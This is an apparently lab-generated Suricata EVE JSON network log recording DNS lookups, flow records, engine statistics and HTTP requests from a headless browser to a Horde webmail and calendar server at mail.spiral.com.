{"timestamp":"2020-02-29T00:05:13.388520+0000","flow_id":212195723528106,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46499,"proto":"UDP","dns":{"type":"answer","id":34980,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:13.456437+0000","flow_id":342874398464368,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34740,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3339}} {"timestamp":"2020-02-29T00:05:15.000206+0000","event_type":"stats","stats":{"uptime":13967,"capture":{"kernel_packets":133393,"kernel_drops":0},"decoder":{"pkts":133399,"bytes":92358527,"invalid":181,"ipv4":131956,"ipv6":8,"ethernet":133399,"raw":0,"null":0,"sll":0,"tcp":126875,"udp":4886,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2699,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2715,"synack":2706,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":17
42,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2227,"failed_udp":110},"tx":{"http":4523,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2304}},"flow_mgr":{"closed_pruned":2680,"new_pruned":15,"est_pruned":2267,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22818,"memcap_state":0,"memcap_global":0},"http":{"memuse":74797,"memcap":0}}} {"timestamp":"2020-02-29T00:05:17.000247+0000","flow_id":859219642302663,"event_type":"flow","src_ip":"192.168.10.122","src_port":44592,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:16.606407+0000","end":"2020-02-29T00:00:16.717444+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:18.000715+0000","flow_id":1375826898671631,"event_type":"flow","src_ip":"192.168.10.122","src_port":34211,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:00:17.808975+0000","end":"2020-02-29T00:00:17.914037+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:18.458620+0000","flow_id":342874398464368,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34740,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3339},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":16766,"tx_id":0}} {"timestamp":"2020-02-29T00:05:22.000735+0000","event_type":"stats","stats":{"uptime":13974,"capture":{"kernel_packets":133419,"kernel_drops":0},"decoder":{"pkts":133419,"bytes":92364099,"invalid":181,"ipv4":131974,"ipv6":8,"ethernet":133419,"raw":0,"null":0,"sll":0,"tcp":126891,"udp":4888,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2700,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2716,"synack":2707,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1743,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2228,"failed_udp":110},"tx":{"http":4524,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2305}},"flow_mgr":{"closed_pruned":2680,"new_pruned":15,"est_pruned":2270,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22157,"memcap_state":0,"memcap_global":0},"http":{"memuse":39940
,"memcap":0}}} {"timestamp":"2020-02-29T00:05:23.000408+0000","flow_id":568154018685187,"event_type":"flow","src_ip":"192.168.10.130","src_port":34726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":18,"pkts_toclient":19,"bytes_toserver":3325,"bytes_toclient":14106,"start":"2020-02-29T00:04:06.663811+0000","end":"2020-02-29T00:04:22.205376+0000","age":16,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:05:23.472786+0000","flow_id":374562667837138,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41142,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35915,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:23.581640+0000","flow_id":374562667837138,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41142,"proto":"UDP","dns":{"type":"answer","id":35915,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:23.581640+0000","flow_id":374562667837138,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41142,"proto":"UDP","dns":{"type":"answer","id":35915,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:23.743422+0000","flow_id":83501324109156,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34742,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6897}} {"timestamp":"2020-02-29T00:05:28.745767+0000","flow_id":83501324109156,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34742,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6897},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":35877,"tx_id":0}} {"timestamp":"2020-02-29T00:05:29.000140+0000","event_type":"stats","stats":{"uptime":13981,"capture":{"kernel_packets":133423,"kernel_drops":0},"decoder":{"pkts":133438,"bytes":92373299,"invalid":181,"ipv4":131993,"ipv6":8,"ethernet":133438,"raw":0,"null":0,"sll":0,"tcp":126908,"udp":4890,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2701,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2717,"synack":2708,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632}
,"detect":{"alert":24},"app_layer":{"flow":{"http":1744,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2229,"failed_udp":110},"tx":{"http":4525,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2306}},"flow_mgr":{"closed_pruned":2681,"new_pruned":15,"est_pruned":2270,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22488,"memcap_state":0,"memcap_global":0},"http":{"memuse":69495,"memcap":0}}} {"timestamp":"2020-02-29T00:05:29.001158+0000","flow_id":1313463988770583,"event_type":"flow","src_ip":"192.168.10.130","src_port":34728,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":34,"pkts_toclient":37,"bytes_toserver":4254,"bytes_toclient":39885,"start":"2020-02-29T00:04:09.251671+0000","end":"2020-02-29T00:04:28.151570+0000","age":19,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:05:29.002872+0000","flow_id":1115796709773253,"event_type":"flow","src_ip":"192.168.10.81","src_port":52682,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":9,"pkts_toclient":13,"bytes_toserver":1099,"bytes_toclient":10025,"start":"2020-02-29T00:04:23.528325+0000","end":"2020-02-29T00:04:28.933275+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:05:29.640045+0000","flow_id":893553631413293,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51580,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43519,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:29.748633+0000","flow_id":893553631413293,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51580,"proto":"UDP","dns":{"type":"answer","id":43519,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:29.748633+0000","flow_id":893553631413293,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51580,"proto":"UDP","dns":{"type":"answer","id":43519,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:30.304068+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24343}} {"timestamp":"2020-02-29T00:05:30.445906+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34744,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24343},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:05:30.454866+0000","flow_id":1021062620573906,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33976,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":4505,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:30.563509+0000","flow_id":1021062620573906,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33976,"proto":"UDP","dns":{"type":"answer","id":4505,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:30.563509+0000","flow_id":1021062620573906,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33976,"proto":"UDP","dns":{"type":"answer","id":4505,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:30.623204+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639}} 
{"timestamp":"2020-02-29T00:05:30.623204+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":1}} {"timestamp":"2020-02-29T00:05:30.655250+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34744,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1656,"tx_id":1}} {"timestamp":"2020-02-29T00:05:30.670217+0000","flow_id":113437246634505,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41347,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43045,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:05:30.778890+0000","flow_id":113437246634505,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41347,"proto":"UDP","dns":{"type":"answer","id":43045,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:30.778890+0000","flow_id":113437246634505,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41347,"proto":"UDP","dns":{"type":"answer","id":43045,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:30.841339+0000","flow_id":214948798715515,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60298,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":38798,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:30.949739+0000","flow_id":214948798715515,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60298,"proto":"UDP","dns":{"type":"answer","id":38798,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:30.949739+0000","flow_id":214948798715515,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60298,"proto":"UDP","dns":{"type":"answer","id":38798,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:30.985302+0000","flow_id":263627957994143,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34746,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 
HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:05:30.985302+0000","flow_id":263627957994143,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34746,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":0}} {"timestamp":"2020-02-29T00:05:31.023880+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592}} {"timestamp":"2020-02-29T00:05:31.023880+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) 
AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":2}} {"timestamp":"2020-02-29T00:05:32.000208+0000","flow_id":987695000028206,"event_type":"flow","src_ip":"192.168.10.122","src_port":51758,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:00:31.230446+0000","end":"2020-02-29T00:00:31.336274+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:35.986970+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34744,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":1378,"tx_id":2}} {"timestamp":"2020-02-29T00:05:35.990066+0000","flow_id":263627957994143,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34746,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) 
AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":0}} {"timestamp":"2020-02-29T00:05:36.000258+0000","event_type":"stats","stats":{"uptime":13988,"capture":{"kernel_packets":133488,"kernel_drops":0},"decoder":{"pkts":133497,"bytes":92407732,"invalid":181,"ipv4":132052,"ipv6":8,"ethernet":133497,"raw":0,"null":0,"sll":0,"tcp":126959,"udp":4898,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2703,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2719,"synack":2710,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1746,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2233,"failed_udp":110},"tx":{"http":4529,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2310}},"flow_mgr":{"closed_pruned":2683,"new_pruned":15,"est_pruned":2271,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":
65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23482,"memcap_state":0,"memcap_global":0},"http":{"memuse":45335,"memcap":0}}} {"timestamp":"2020-02-29T00:05:38.000700+0000","flow_id":1694633747830855,"event_type":"flow","src_ip":"192.168.10.130","src_port":34732,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1875,"bytes_toclient":5458,"start":"2020-02-29T00:04:32.088135+0000","end":"2020-02-29T00:04:37.456773+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:05:38.003807+0000","flow_id":243338513312687,"event_type":"flow","src_ip":"192.168.10.122","src_port":43094,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:00:37.879535+0000","end":"2020-02-29T00:00:37.984947+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:41.000331+0000","flow_id":738608386810466,"event_type":"flow","src_ip":"192.168.10.130","src_port":34730,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":18,"pkts_toclient":19,"bytes_toserver":2955,"bytes_toclient":14491,"start":"2020-02-29T00:04:22.205410+0000","end":"2020-02-29T00:04:40.307386+0000","age":18,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
